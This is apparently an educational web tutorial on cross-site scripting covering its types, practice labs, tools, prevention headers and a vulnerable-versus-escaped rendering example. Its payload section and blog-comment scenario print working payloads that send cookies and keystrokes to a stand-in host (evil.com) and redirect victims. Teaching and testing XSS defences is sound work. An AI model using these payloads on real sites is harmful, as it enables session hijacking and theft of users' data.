Learn Cross-Site Scripting (XSS) from Scratch – Beginner to Expert
🔰 1. Introduction to XSS
✅ What is Cross-Site Scripting (XSS)?
XSS is a web vulnerability that lets an attacker inject script into pages served by a trusted website, so that the script runs in other users' browsers with that site's origin, cookies and DOM access.
✅ Why is XSS Dangerous?
It can compromise user data, steal sessions, impersonate users, or even spread malware.
✅ History & Importance
XSS has been consistently ranked in the OWASP Top 10 for web application vulnerabilities due to its impact and prevalence.
✅ Real-World Exploits
- MySpace worm (Samy, 2005): a stored XSS payload in a profile page that added the author as a friend and copied itself into every visitor's profile
- British Airways (2018): malicious JavaScript injected into the site's payment pages skimmed customer card details
- eBay: XSS in product listings used to redirect shoppers to phishing pages
🧪 2. How XSS Works
✅ Browsers render HTML and execute any JavaScript they find in it as part of the page
✅ Vulnerable apps place untrusted input into a page without validating or encoding it for the context it lands in
✅ The attacker's input therefore becomes part of the page's markup or script instead of plain data
✅ That script then runs in every victim's browser with the site's origin, so it can read cookies, the DOM and the user's session
🎯 3. What Can an Attacker Do with XSS?
🔓 Steal Cookies / Sessions
🎭 Impersonate Users
🪝 Phishing Forms
💣 Deliver Malware
🎮 Hijack User Inputs
🧬 4. Types of XSS (With Examples)
🔹 a) Reflected XSS
The payload travels in the request (URL, form field, search parameter) and is echoed straight back in the response; the victim has to be tricked into sending that request, usually via a crafted link
Example:
http://example.com/search?q=<script>alert(1)</script>
🔹 b) Stored XSS
The payload is persisted server-side (database record, comment, profile field, or a log that an admin later views) and served to every user who views that data, with no further interaction needed
Example:
<script>alert('Stored XSS')</script>
🔹 c) DOM-Based XSS
The payload never reaches the server: client-side JavaScript reads an attacker-controlled source (location.hash, location.search, document.referrer) and writes it into a dangerous sink (innerHTML, document.write(), eval())
Example:
var name = location.hash.substring(1);
document.getElementById("output").innerHTML = name;
// Input: #<img src=x onerror=alert(1)>
// Note: a <script> tag inserted via innerHTML is not executed by browsers,
// so DOM XSS through this sink needs an event-handler payload like the one above
🔍 5. Where to Practice XSS (Safe Labs)
| Platform | Purpose |
|---|---|
| DVWA | Beginner-friendly web app |
| bWAPP | Full-feature testbed |
| WebGoat | Official OWASP training app |
| XSS Game | Learn XSS through fun levels |
| PortSwigger Labs | Real-world XSS labs with explanations |
🧰 6. Tools for XSS Testing
🔧 Burp Suite – Intercept & modify requests
⚔️ XSStrike – Advanced automated XSS scanner
🔬 XSS Hunter – Track blind XSS payloads
🧠 HackBar (Firefox/Chrome extension) – Test payloads quickly
📦 OWASP ZAP – Free, full-featured security scanner
💥 7. XSS Payloads (Basic to Advanced)
🧪 Basic:
<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
🧪 Steal Cookie (only cookies without the HttpOnly flag are readable from document.cookie):
<script>fetch('http://evil.com?cookie='+document.cookie)</script>
🧪 Redirect Victim:
<script>window.location='http://attacker.com'</script>
🧪 Keylogger:
<script>
document.onkeypress=function(e){
fetch('http://evil.com?key='+e.key)}
</script>
📦 Explore more payloads on GitHub:
👉 KIRAN-KUMAR-K3/vulnerability-payload-lists
🚨 8. Real-World Scenario (Example)
A blog allows users to comment without sanitization:
<textarea name="comment"></textarea>
An attacker submits:
<script>new Image().src='http://evil.com?c='+document.cookie</script>
Result: Every user who views the comment section runs the script; if the session cookie is not marked HttpOnly, it is sent to the attacker's server and the session can be hijacked.
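The blog-comment scenario above rendered two ways, as an added example that is not code from the original page: the function names (renderCommentVulnerable, renderCommentSafe, escapeHtml, templateIntact) and the sample comments are this example's own assumptions. The vulnerable renderer concatenates the comment into the markup exactly as the scenario describes; the safe one encodes every untrusted value for the slot it goes into, including the attribute context, which is where the `"` and `'` in the escaping list matter.

```javascript
// Added example, not from the original page. Names and sample data are assumed.

// Context-aware HTML entity encoding for text nodes and quoted attribute values.
// Every character that can end a text node or an attribute value is replaced,
// so attacker input can never start a new tag or event handler.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')   // must come first so existing entities are not double-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: raw string concatenation, the bug the scenario describes.
// The comment text and author land in the HTML exactly as submitted.
function renderCommentVulnerable(author, text) {
  return '<div class="comment" data-author="' + author + '">' + text + '</div>';
}

// Fixed: each untrusted value is encoded before it is placed in the template.
function renderCommentSafe(author, text) {
  return '<div class="comment" data-author="' + escapeHtml(author) + '">' +
    escapeHtml(text) + '</div>';
}

// Constructed sample data: a normal comment, the attacker's payload from the
// scenario above, and an attribute-context payload that closes data-author early.
const SAMPLE_COMMENTS = [
  { author: 'alice', text: 'Great post, thanks!' },
  { author: 'mallory',
    text: "<script>new Image().src='http://evil.com?c='+document.cookie</script>" },
  { author: '"><img src=x onerror=alert(1)>', text: 'attribute-context payload' },
];

// Structural self-check: the template itself emits exactly two '<' characters
// (the opening and closing div) and four '"' characters (two quoted attributes).
// Any extra '<' or '"' came from user data, which means the output is injectable.
function templateIntact(html) {
  const lt = (html.match(/</g) || []).length;
  const quotes = (html.match(/"/g) || []).length;
  return lt === 2 && quotes === 4;
}

// Render every sample comment with the given renderer; handy for a quick diff.
function renderAll(renderer) {
  return SAMPLE_COMMENTS.map(c => renderer(c.author, c.text)).join('\n');
}
```

Run `renderAll(renderCommentVulnerable)` next to `renderAll(renderCommentSafe)` in Node to see the difference: `templateIntact` is false for the vulnerable output of both payloads and true for the safe output, and the safe output shows the payload as literal text (`&lt;script&gt;...`) that the browser will display rather than execute.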
🛡️ 9. How to Prevent XSS
✅ Developer Best Practices:
- Validate input on the server (client-side checks can be bypassed) and, above all, encode output for the context it is inserted into
- Escape HTML entities (<, >, ", ', &) when placing data into HTML; attribute, JavaScript, URL and CSS contexts each need their own encoding
- Avoid innerHTML, document.write() and eval(); prefer textContent and setAttribute, and run any HTML you must render from user data through a sanitizer such as DOMPurify
✅ HTTP Security Headers:
Content-Security-Policy: default-src 'self'
(blocks inline scripts and scripts from other origins; allow the inline scripts you need with nonces or hashes rather than 'unsafe-inline')
X-XSS-Protection: 1; mode=block
(legacy browser filter: Chrome and Edge have removed it and Firefox never implemented it, so it provides no real protection today)
X-Content-Type-Options: nosniff
(stops the browser from MIME-sniffing uploaded files or responses into executable script)
✅ Use Secure Frameworks:
- React – JSX interpolation escapes by default; dangerouslySetInnerHTML bypasses it
- Django – Templates auto-escape output; the |safe filter and mark_safe() turn it off
- Ruby on Rails – ERB auto-escapes output; raw and html_safe turn it off
📚 10. Recommended Resources & Payloads
📘 Learning Labs:
🧪 Payload Repository:
🔗 KIRAN-KUMAR-K3/vulnerability-payload-lists on GitHub
🔚 11. Conclusion & Learning Path
✅ XSS is powerful and highly common
✅ Learn the fundamentals before using tools
✅ Practice in legal and controlled environments
✅ Use responsibly to report bugs, not exploit users
✅ Keep contributing to a safer internet
